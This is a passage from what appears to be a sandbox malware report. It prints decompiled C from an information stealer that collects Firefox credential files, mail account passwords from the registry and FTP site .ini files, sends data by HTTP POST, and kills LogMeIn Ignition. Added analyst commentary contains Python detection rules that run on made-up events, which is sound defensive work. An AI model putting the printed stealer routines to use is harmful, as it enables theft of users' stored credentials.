					_t66 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t66;
					__eflags = _t66 + 1;
					if(_t66 + 1 != 0) {
						do {
							_t112 =  &_v324;
							__eflags =  *_t112 & 0x00000010;
							if(( *_t112 & 0x00000010) == 0) {
								_v336 =  &(_t112[0xb]);
								__eflags =  *0x10010155 - 3;
								if( *0x10010155 != 3) {
									_t69 = StrStrIA(_v336, "signons.sqlite");
									__eflags = _t69;
									if(_t69 != 0) {
										E10006CE9(__eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
										E10001871(_t102);
									}
									_t71 = lstrlenA(_v336);
									__eflags = _t71 - 2;
									if(_t71 < 2) {
										L25:
										_t72 = StrStrIA(_v336, "logins.json");
										__eflags = _t72;
										if(_t72 != 0) {
											E100070CA(_t111, __eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
											E10001871(_t98);
										}
										_push(StrStrIA(_v336, "signons.txt"));
										_push(StrStrIA(_v336, "signons2.txt"));
										_t76 = StrStrIA(_v336, "signons3.txt");
										_pop(_t113);
										_pop(_t111);
										__eflags = _t76;
										if(_t76 == 0) {
											__eflags = _t113;
											if(_t113 != 0) {
												goto L30;
											}
											_t111 = _t111;
											__eflags = _t111;
											if(_t111 == 0) {
												goto L31;
											}
										}
										goto L30;
									} else {
										__eflags =  *((short*)( &(_v336[_t71]) - 2)) - 0x732e;
										if( *((short*)( &(_v336[_t71]) - 2)) != 0x732e) {
											goto L25;
										}
										L30:
										E10006D74(__eflags, _a4, E10001E05(E10001DB1(_a16, "\\"), _v336), _a8, _a12);
										E10001871(_t79);
										goto L31;
									}
								}
								_t105 = StrStrIA(_v336, "prefs.js");
								__eflags = _t105;
								if(_t105 != 0) {
									E10004064(_a4, E10001E05(E10001DB1(_a16, "\\"), _v336), 0xbeef0001);
									E10001871(_t108);
								}
								goto L31;
							}
							_t85 = lstrcmpiA(0x1000f8fd,  &(_t112[0xb]));
							__eflags = _t85;
							if(_t85 != 0) {
								_t88 = lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName));
								__eflags = _t88;
								if(_t88 != 0) {
									_t90 = E10002582(_a16);
									__eflags = _t90;
									if(_t90 != 0) {
										_t92 = E10001DB1(_a16, 0);
									} else {
										_t92 = E10001DB1(_a16, "\\");
									}
									E10007241(_t111, _a4, _a8, _a12, E10001E05(_t92,  &( &_v324->cFileName))); // executed
									E10001871(_t93);
								}
							}
							L31:
							_t83 = FindNextFileA(_v328,  &_v324); // executed
							__eflags = _t83;
						} while (_t83 != 0);
						FindClose(_v328); // executed
                                                                                                                                        					}
                                                                                                                                        					goto L33;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 100072B1
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 100072DE
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 100072FB
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,logins.json,?,?,signons.sqlite,00000000,?), ref: 100074D6
                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,logins.json,?,?,signons.sqlite,00000000), ref: 100074E9
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*$logins.json$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                        • API String ID: 3040542784-2271207088
                                                                                                                                        • Opcode ID: 6cf854818f28cac10bb1caf6164baf92943aa95b4d27f9d6e031be1e0cb0c29e
                                                                                                                                        • Instruction ID: af118ac29e4605c55e8ebb5d1e7de07e878cf17fe34cc356127bacf430de975d
                                                                                                                                        • Opcode Fuzzy Hash: 6cf854818f28cac10bb1caf6164baf92943aa95b4d27f9d6e031be1e0cb0c29e
                                                                                                                                        • Instruction Fuzzy Hash: 4161207590110ABAFF52DF60DC46EEE7A66FF043C0F148091F90CA5069DB39EEA0AB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02442250(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				signed int _v16;
                                                                                                                                        				void _v20;
                                                                                                                                        				signed short _v24;
                                                                                                                                        				void _v28;
                                                                                                                                        				int _v32;
                                                                                                                                        				void* _v36;
                                                                                                                                        				int _v40;
                                                                                                                                        				long _v44;
                                                                                                                                        				long _v48;
                                                                                                                                        				int _v52;
                                                                                                                                        				intOrPtr _v64;
                                                                                                                                        				char* _v68;
                                                                                                                                        				signed short _v88;
                                                                                                                                        				intOrPtr _v92;
                                                                                                                                        				char* _v96;
                                                                                                                                        				long _v100;
                                                                                                                                        				void* _v112;
                                                                                                                                        				char _v372;
                                                                                                                                        				char _v632;
                                                                                                                                        				int _t85;
                                                                                                                                        				int _t93;
                                                                                                                                        
                                                                                                                                        				E024414A0( &_v112, 0, 0x3c);
                                                                                                                                        				_v112 = 0x3c;
                                                                                                                                        				_v96 =  &_v372;
                                                                                                                                        				_v92 = 0x104;
                                                                                                                                        				_v68 =  &_v632;
                                                                                                                                        				_v64 = 0x104;
                                                                                                                                        				_v32 = 0;
                                                                                                                                        				_v52 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
                                                                                                                                        				if(_a8 != 0) {
                                                                                                                                        					_v32 = lstrlenA(_a8);
                                                                                                                                        				}
                                                                                                                                        				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
                                                                                                                                        					if(_v100 == 0) {
                                                                                                                                        						_v100 = 3;
                                                                                                                                        					}
                                                                                                                                        					if(_v100 == 3 || _v100 == 4) {
                                                                                                                                        						_v36 = E02441EA0();
                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                        							_v24 = _v88;
                                                                                                                                        							_v16 = 0x84080100;
                                                                                                                                        							if(_v100 == 4) {
                                                                                                                                        								_v16 = _v16 | 0x00803000;
                                                                                                                                        							}
                                                                                                                                        							_v12 = InternetConnectA(_v36,  &_v372, _v24 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                        							if(_v12 != 0) {
                                                                                                                                        								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x2447048, _v16, 0);
                                                                                                                                        								if(_v8 != 0) {
                                                                                                                                        									if(_v100 == 4) {
                                                                                                                                        										_v48 = 4;
                                                                                                                                        										InternetQueryOptionA(_v8, 0x1f,  &_v20,  &_v48);
                                                                                                                                        										_v20 = _v20 | 0x00001100;
                                                                                                                                        										InternetSetOptionA(_v8, 0x1f,  &_v20, 4);
                                                                                                                                        									}
                                                                                                                                        									_t85 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v52, _a8, _v32); // executed
                                                                                                                                        									_v40 = _t85;
                                                                                                                                        									_v28 = 0;
                                                                                                                                        									if(_v40 == 1) {
                                                                                                                                        										_v44 = 4;
                                                                                                                                        										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v44, 0);
                                                                                                                                        										if(_v28 == 0xc8 && _a12 != 0) {
                                                                                                                                        											_t93 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
                                                                                                                                        											if(_t93 == 0 ||  *_a20 <= 0) {
                                                                                                                                        												 *_a20 = 0;
                                                                                                                                        											} else {
                                                                                                                                        												 *((char*)(_a12 +  *_a20)) = 0;
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        									InternetCloseHandle(_v8); // executed
                                                                                                                                        									InternetCloseHandle(_v12);
                                                                                                                                        									if(_v28 != 0xc8) {
                                                                                                                                        										return 0;
                                                                                                                                        									} else {
                                                                                                                                        										return 1;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        								InternetCloseHandle(_v12);
                                                                                                                                        								return 0;
                                                                                                                                        							} else {
                                                                                                                                        								return 0;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						return 0;
                                                                                                                                        					} else {
                                                                                                                                        						return 0;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}

                                                                                                                                        0x02442261
                                                                                                                                        0x02442269
                                                                                                                                        0x02442276
                                                                                                                                        0x02442279
                                                                                                                                        0x02442286
                                                                                                                                        0x02442289
                                                                                                                                        0x02442290
                                                                                                                                        0x024422a2
                                                                                                                                        0x024422a9
                                                                                                                                        0x024422b5
                                                                                                                                        0x024422b5
                                                                                                                                        0x024422cc
                                                                                                                                        0x024422d9
                                                                                                                                        0x024422db
                                                                                                                                        0x024422db
                                                                                                                                        0x024422e6
                                                                                                                                        0x024422fa
                                                                                                                                        0x02442301
                                                                                                                                        0x0244230e
                                                                                                                                        0x02442312
                                                                                                                                        0x0244231d
                                                                                                                                        0x02442328
                                                                                                                                        0x02442328
                                                                                                                                        0x0244234b
                                                                                                                                        0x02442352
                                                                                                                                        0x02442380
                                                                                                                                        0x02442387
                                                                                                                                        0x0244239e
                                                                                                                                        0x024423a0
                                                                                                                                        0x024423b5
                                                                                                                                        0x024423c3
                                                                                                                                        0x024423d2
                                                                                                                                        0x024423d2
                                                                                                                                        0x024423ed
                                                                                                                                        0x024423f3
                                                                                                                                        0x024423f6
                                                                                                                                        0x02442401
                                                                                                                                        0x02442403
                                                                                                                                        0x0244241d
                                                                                                                                        0x0244242a
                                                                                                                                        0x02442445
                                                                                                                                        0x0244244d
                                                                                                                                        0x02442468
                                                                                                                                        0x02442457
                                                                                                                                        0x0244245f
                                                                                                                                        0x0244245f
                                                                                                                                        0x0244244d
                                                                                                                                        0x0244242a
                                                                                                                                        0x02442472
                                                                                                                                        0x0244247c
                                                                                                                                        0x02442489
                                                                                                                                        0x00000000
                                                                                                                                        0x0244248b
                                                                                                                                        0x00000000
                                                                                                                                        0x0244248b
                                                                                                                                        0x02442489
                                                                                                                                        0x0244238d
                                                                                                                                        0x00000000
                                                                                                                                        0x02442354
                                                                                                                                        0x00000000
                                                                                                                                        0x02442354
                                                                                                                                        0x02442352
                                                                                                                                        0x00000000
                                                                                                                                        0x024422ee
                                                                                                                                        0x00000000
                                                                                                                                        0x024422ee
                                                                                                                                        0x024422e6
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 0244229C
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024422AF
                                                                                                                                          • Part of subcall function 02441EA0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 02441EB9
                                                                                                                                        • InternetCrackUrlA.WININET(00000001,00000000,00000000,0000003C), ref: 024422C4
                                                                                                                                        • InternetConnectA.WININET(00000000,?,0283CB28,00000000,00000000,00000003,00000000,00000000), ref: 02442345
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$lstrlen$ConnectCrackOpen
                                                                                                                                        • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                        • API String ID: 4167639401-2842678110
                                                                                                                                        • Opcode ID: 862db2d1399a5e6c6327f366533fd46db540878a7e3b980871ca5646020905d1
                                                                                                                                        • Instruction ID: 477b391954daeddaba9c8f7d255a926f514364c158ad85ee0bd1edc04dc1286b
                                                                                                                                        • Opcode Fuzzy Hash: 862db2d1399a5e6c6327f366533fd46db540878a7e3b980871ca5646020905d1
                                                                                                                                        • Instruction Fuzzy Hash: E1714F75D00219EFEB14CFA0C849BEEB7B5FB48705F108559FA05AB280DBB49A94CF60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000AF31() {
                                                                                                                                        				void* _t2;
                                                                                                                                        
                                                                                                                                        				 *((intOrPtr*)(_t2 - 0x12c)) = 0x128;
                                                                                                                                        			}

                                                                                                                                        0x1000af31

                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000AF3F
                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 1000AF5C
                                                                                                                                        • StrStrIA.SHLWAPI(?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF71
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF84
                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000,00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF95
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,?,?,LMIIgnition.exe,?,00000128,?,LMIIgnition.exe,?,00000128,00000002,00000000), ref: 1000AF9D
                                                                                                                                        • Process32Next.KERNEL32 ref: 1000AFAF
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 1000AFBC
                                                                                                                                        • CreateMutexA.KERNEL32(?,00000001,Local\mtxLogMeInIgnition.IgnitionMutex), ref: 1000AFFF
                                                                                                                                        • CreateProcessA.KERNEL32 ref: 1000B042
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess$CloseHandleProcess32$FirstMutexNextOpenSnapshotTerminateToolhelp32
                                                                                                                                        • String ID: D$LMIIgnition.exe$Local\mtxLogMeInIgnition.IgnitionMutex$cmd /K
                                                                                                                                        • API String ID: 2499566100-1314236455
                                                                                                                                        • Opcode ID: f12d1455fa970ffafe11a4fbe45f8ea2f455555ead75f3599e78d725217e9042
                                                                                                                                        • Instruction ID: 10dda9514106c42c136323d331f6baabf7aa41eb36a0f51c0990b8a4397cd6d0
                                                                                                                                        • Opcode Fuzzy Hash: f12d1455fa970ffafe11a4fbe45f8ea2f455555ead75f3599e78d725217e9042
                                                                                                                                        • Instruction Fuzzy Hash: 53211DB5A50618AAFF21DBA0CD42FED76B8EF04780F5001D1B318B50D6DBB5AF948B15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000A34F(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				char _v2064;
                                                                                                                                        				char* _v2068;
                                                                                                                                        				intOrPtr _v2072;
                                                                                                                                        				intOrPtr _v2076;
                                                                                                                                        				intOrPtr _v2080;
                                                                                                                                        				intOrPtr _v2084;
                                                                                                                                        				char _v2088;
                                                                                                                                        				intOrPtr _v2092;
                                                                                                                                        				intOrPtr _v2096;
                                                                                                                                        				char _v2100;
                                                                                                                                        				intOrPtr _v2104;
                                                                                                                                        				intOrPtr _v2108;
                                                                                                                                        				char _v2112;
                                                                                                                                        				intOrPtr _v2116;
                                                                                                                                        				intOrPtr _v2120;
                                                                                                                                        				char _v2124;
                                                                                                                                        				long _t93;
                                                                                                                                        				long _t94;
                                                                                                                                        
                                                                                                                                        				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                                                                                        				_t94 = _t93;
                                                                                                                                        				if(_t94 == 0) {
                                                                                                                                        					_v12 = 0;
                                                                                                                                        					while(1) {
                                                                                                                                        						_v16 = 0x7ff;
                                                                                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064);
                                                                                                                                        						_v2072 = E10001D2A(_a4, _v2068, "EmailAddress", 0);
                                                                                                                                        						_v2076 = E10001D2A(_a4, _v2068, "Technology", 0);
                                                                                                                                        						_v2080 = E10001D2A(_a4, _v2068, "PopServer", 0);
                                                                                                                                        						_v2084 = E10001D2A(_a4, _v2068, "PopPort",  &_v2088);
                                                                                                                                        						_v2092 = E10001D2A(_a4, _v2068, "PopAccount", 0);
                                                                                                                                        						_v2096 = E10001D2A(_a4, _v2068, "PopPassword",  &_v2100);
                                                                                                                                        						_v2104 = E10001D2A(_a4, _v2068, "SmtpServer", 0);
                                                                                                                                        						_v2108 = E10001D2A(_a4, _v2068, "SmtpPort",  &_v2112);
                                                                                                                                        						_v2116 = E10001D2A(_a4, _v2068, "SmtpAccount", 0);
                                                                                                                                        						_v2120 = E10001D2A(_a4, _v2068, "SmtpPassword",  &_v2124);
                                                                                                                                        						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
                                                                                                                                        							E10001522(_a12, 0xbeef0000);
                                                                                                                                        							E10001584(_a12, _v2072);
                                                                                                                                        							E10001584(_a12, _v2076);
                                                                                                                                        							E10001584(_a12, _v2080);
                                                                                                                                        							E10001558(_a12, _v2084, _v2088);
                                                                                                                                        							E10001584(_a12, _v2092);
                                                                                                                                        							E10001558(_a12, _v2096, _v2100);
                                                                                                                                        							E10001584(_a12, _v2104);
                                                                                                                                        							E10001558(_a12, _v2108, _v2112);
                                                                                                                                        							E10001584(_a12, _v2116);
                                                                                                                                        							E10001558(_a12, _v2120, _v2124);
                                                                                                                                        						}
                                                                                                                                        						E1000A34F(_a4, _v2068, _a12);
                                                                                                                                        						E10001871(_v2068);
                                                                                                                                        						E10001871(_v2072);
                                                                                                                                        						E10001871(_v2076);
                                                                                                                                        						E10001871(_v2080);
                                                                                                                                        						E10001871(_v2084);
                                                                                                                                        						E10001871(_v2092);
                                                                                                                                        						E10001871(_v2096);
                                                                                                                                        						E10001871(_v2104);
                                                                                                                                        						E10001871(_v2108);
                                                                                                                                        						E10001871(_v2116);
                                                                                                                                        						E10001871(_v2120);
                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                        					}
                                                                                                                                        					return RegCloseKey(_v8);
                                                                                                                                        				}
                                                                                                                                        				return _t94;
                                                                                                                                        			}
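The routine above opens one registry key, walks its subkeys with RegEnumKeyExA and reads ten fixed value names from each (the String ID line lists them). A subkey is only serialised (tag 0xbeef0000, then the string and port fields) when EmailAddress is present and at least one of PopPassword or SmtpPassword is present; subkeys without a stored password are skipped. The following is an added detection example, not code from the sample or from the report: it replays that same predicate over registry-read events and flags readers that are not the mail client expected to touch those values. Event records, the HKCU\Software\Vendor\Accounts key path, the process names and the allowlist are constructed assumptions; the page does not identify which client stores its accounts under this layout.

```python
"""Added example: flag processes that read mail-account registry values the
way the sample does (identity + password from the same subkey).

Event format is a constructed, Procmon-like CSV: pid,process,operation,path.
Key paths and process names are made-up test data, not indicators from the report.
"""
from collections import defaultdict

# Value names read per subkey in the decompiled routine (String ID line).
TARGET_VALUES = {
    "EmailAddress", "Technology", "PopServer", "PopPort", "PopAccount",
    "PopPassword", "SmtpServer", "SmtpPort", "SmtpAccount", "SmtpPassword",
}
# The sample's own condition: EmailAddress != 0 && (PopPassword || SmtpPassword)
IDENTITY_VALUE = "EmailAddress"
SECRET_VALUES = {"PopPassword", "SmtpPassword"}

# Constructed sample events. Account1 has a stored password, Account2 does not,
# OUTLOOK.EXE is the legitimate reader, the Run key read is unrelated noise.
SAMPLE_EVENTS = """\
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account1\\EmailAddress
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account1\\PopServer
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account1\\PopPassword
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account2\\EmailAddress
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account2\\SmtpServer
2208,OUTLOOK.EXE,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account1\\EmailAddress
2208,OUTLOOK.EXE,RegQueryValue,HKCU\\Software\\Vendor\\Accounts\\Account1\\PopPassword
4120,svchost.exe,RegQueryValue,HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater
"""


def parse_events(text):
    """Split CSV lines into (pid, process, operation, key, value_name) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, proc, op, path = line.split(",", 3)
        key, _, value = path.rpartition("\\")   # last component is the value name
        events.append((int(pid), proc, op, key, value))
    return events


def harvesting_hits(events, expected_readers=frozenset()):
    """Return {(pid, process): [subkeys]} for readers that satisfied the
    sample's predicate on at least one subkey.

    `expected_readers` (lower-case image names) is an assumed allowlist: a real
    mail client legitimately reads these same values, so the value set alone
    is not a verdict; the reader identity is what separates the stealer.
    """
    seen = defaultdict(set)   # (pid, proc, subkey) -> target value names read
    for pid, proc, op, key, value in events:
        if op != "RegQueryValue" or value not in TARGET_VALUES:
            continue
        seen[(pid, proc, key)].add(value)

    hits = defaultdict(list)
    for (pid, proc, key), values in seen.items():
        if proc.lower() in expected_readers:
            continue
        if IDENTITY_VALUE in values and values & SECRET_VALUES:
            hits[(pid, proc)].append(key)
    return {k: sorted(v) for k, v in hits.items()}


if __name__ == "__main__":
    for reader, keys in harvesting_hits(parse_events(SAMPLE_EVENTS),
                                        expected_readers={"outlook.exe"}).items():
        print(reader, "->", keys)
```

Account2 is read but never flagged, exactly as the sample skips it: without PopPassword or SmtpPassword there is nothing worth exfiltrating. Without the allowlist OUTLOOK.EXE is flagged too, which is the false positive a practitioner has to budget for when writing this rule.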
Listing addresses (gutter column of the C listing): 0x1000a362 to 0x1000a657

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A362
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A396
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A651
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                                                        • API String ID: 1332880857-2111798378
                                                                                                                                        • Opcode ID: 7dd37e93d84252d1bb9617f3d39f138388b42e95bf8b46414ef41dd468575a96
                                                                                                                                        • Instruction ID: 2785ff9534aa53aa2815e2693f8d91cd548089f1898f8c4855caa4bf57c61797
                                                                                                                                        • Opcode Fuzzy Hash: 7dd37e93d84252d1bb9617f3d39f138388b42e95bf8b46414ef41dd468575a96
                                                                                                                                        • Instruction Fuzzy Hash: 5F71643590011DEAEF22AF60CC51BDDBAB6FF04240F14C5A5F69865065DF72ABA1EF80
Uniqueness
• Uniqueness Score: 16.53%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E10004A84(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                        				void* _v328;
                                                                                                                                        				CHAR* _v332;
                                                                                                                                        				char* _v336;
                                                                                                                                        				char* _t34;
                                                                                                                                        				CHAR* _t38;
                                                                                                                                        				void* _t42;
                                                                                                                                        				char* _t61;
                                                                                                                                        				char* _t62;
                                                                                                                                        				void* _t66;
                                                                                                                                        				signed int* _t67;
                                                                                                                                        				void* _t68;
                                                                                                                                        
                                                                                                                                        				_t66 = __ecx;
                                                                                                                                        				_v332 = 0;
                                                                                                                                        				_t34 = _a8;
                                                                                                                                        				if(_t34 == 0 ||  *_t34 == 0) {
                                                                                                                                        					L22:
                                                                                                                                        					return E10001871(_v332);
                                                                                                                                        				} else {
                                                                                                                                        					if(E10002582(_a8) != 0) {
                                                                                                                                        						_t38 = E10001DB1(_a8, "*.*");
                                                                                                                                        					} else {
                                                                                                                                        						_t38 = E10001DB1(_a8, "\*.*");
                                                                                                                                        					}
                                                                                                                                        					_v332 = _t38;
                                                                                                                                        					E1000189F( &_v324, 0x13e);
                                                                                                                                        					_t42 = FindFirstFileA(_v332,  &_v324); // executed
                                                                                                                                        					_v328 = _t42;
                                                                                                                                        					if(_t42 + 1 != 0) {
                                                                                                                                        						do {
                                                                                                                                        							_t67 =  &_v324;
                                                                                                                                        							if(( *_t67 & 0x00000010) == 0) {
                                                                                                                                        								_v336 =  &(_t67[0xb]);
                                                                                                                                        								if(StrStrIA(_v336, ".ini") != 0) {
                                                                                                                                        									_t61 = E10001E05(E10001DB1(_a8, "\\"), _v336);
                                                                                                                                        									_push(_t61);
                                                                                                                                        									_push(_t61);
                                                                                                                                        									if(_a12 == 0) {
                                                                                                                                        										_t62 = 1;
                                                                                                                                        									} else {
                                                                                                                                        										_t62 = StrStrIA(_t61, "Sites\\");
                                                                                                                                        									}
                                                                                                                                        									_pop(_t68);
                                                                                                                                        									if(_t62 != 0) {
                                                                                                                                        										E10004A6D(_a4, _t68);
                                                                                                                                        									}
                                                                                                                                        									E10001871();
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								if(lstrcmpiA(0x1000f8fd,  &(_t67[0xb])) != 0) {
                                                                                                                                        									if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
                                                                                                                                        										E10004A84(_t66, _a4, E10001E05(E10001DB1(_a8, "\\"),  &( &_v324->cFileName)), _a12);
                                                                                                                                        										E10001871(_t56);
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                                                                                        						FindClose(_v328);
                                                                                                                                        					}
                                                                                                                                        					goto L22;
                                                                                                                                        				}
                                                                                                                                        			}
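E10004A84 is a recursive directory walk: FindFirstFileA on <dir>\*.*, recursion into every entry with attribute bit 0x10 (dwFileAttributes at offset 0 of WIN32_FIND_DATAA; cFileName is _t67[0xb], offset 0x2c) except the two names compared against the strings at 0x1000f8fd and 0x1000f8ff, which sit two bytes apart and are therefore consistent with "." and ".." (an inference from the addresses, not something the page shows). Files are kept when StrStrIA(cFileName, ".ini") matches, a case-insensitive substring test rather than an extension check, and, when the third argument is non-zero, only if the full path also contains "Sites\". Below is an added model of that selection logic, not code from the sample or the report, so an analyst can predict which files the routine touched on a given tree (for access-timestamp checks or for placing a decoy profile). The directory tree and the FtpClient folder name are constructed; the page does not identify which application's Sites\*.ini profiles are targeted.

```python
"""Added example: reproduce the file-selection predicate of E10004A84 over a
constructed directory tree (no real filesystem access).

The tree maps a directory path to the (name, attributes) entries that
FindFirstFileA/FindNextFileA would return, "." and ".." included.
"""
FILE_ATTRIBUTE_DIRECTORY = 0x10
FILE_ATTRIBUTE_ARCHIVE = 0x20

# Constructed tree; application and user names are made up.
SAMPLE_TREE = {
    r"C:\Users\victim\AppData\Roaming\FtpClient": [
        (".", FILE_ATTRIBUTE_DIRECTORY), ("..", FILE_ATTRIBUTE_DIRECTORY),
        ("Sites", FILE_ATTRIBUTE_DIRECTORY),
        ("settings.ini", FILE_ATTRIBUTE_ARCHIVE),
        ("readme.txt", FILE_ATTRIBUTE_ARCHIVE),
    ],
    r"C:\Users\victim\AppData\Roaming\FtpClient\Sites": [
        (".", FILE_ATTRIBUTE_DIRECTORY), ("..", FILE_ATTRIBUTE_DIRECTORY),
        ("work.ini", FILE_ATTRIBUTE_ARCHIVE),
        ("backup.INI.bak", FILE_ATTRIBUTE_ARCHIVE),   # substring match, still taken
        ("notes.txt", FILE_ATTRIBUTE_ARCHIVE),
    ],
}


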